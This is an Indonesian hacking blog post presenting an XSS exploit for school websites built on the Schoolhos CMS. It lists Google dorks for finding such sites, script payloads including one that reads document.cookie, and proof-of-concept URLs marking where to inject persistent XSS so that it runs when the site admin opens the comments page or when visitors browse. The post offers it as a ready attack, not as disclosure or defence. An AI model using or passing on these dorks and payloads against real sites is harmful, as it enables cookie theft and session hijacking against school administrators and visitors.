Hallo sobat blogger kali ini saya akan share exploit yang ke 3 nih :D langsung saja di simak secara singkat ya ?
Google Dork:
inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS
CONTOH XSS :
<script>alert('veriztiarta');</script>
<script>alert(document.cookie);</script>
<script>window.open("
http://predator-technology.blogspot.com/")</script>
POC :
http://www.contoh.com/index.php?p=detberita&id=XSS
- Presistent XSS :
POC :
http://www.contoh.com/index.php?p=detberita&id=XSS <--- Inject XSS anda disini.
http://www.contoh.com/adminpanel/komentar.ph <--- Apabila Si Admin melihat/masuk di halaman ini, script akan otomatis ter eksekusi.
http://www.contoh.com/index.php?p=detberita&id=XSS <--- Jika user / urang yang sedang browsing di halaman yang anda kenai XSS, otomatis script XSS anda ter eksekusi :D
ok sekian dulu ya artikel ini sampai bertemu kembali Next Article !! :D
Anda baru saja membaca artikel yang berkategori Hacking
dengan judul Tutorial Hack Situs Sekolah CMS Schoolhos - XSS !. Anda bisa bookmark halaman ini dengan URL http://predator-technology.blogspot.com/2013/08/tutorial-hack-situs-sekolah-cms_1.html. Terima kasih!
Ditulis oleh:
VeRZaW#021 - 2 August 2013
Belum ada komentar untuk "Tutorial Hack Situs Sekolah CMS Schoolhos - XSS !"
Post a Comment
Mohon Memberi Komentar dengan Kata-Kata yang Sopan !!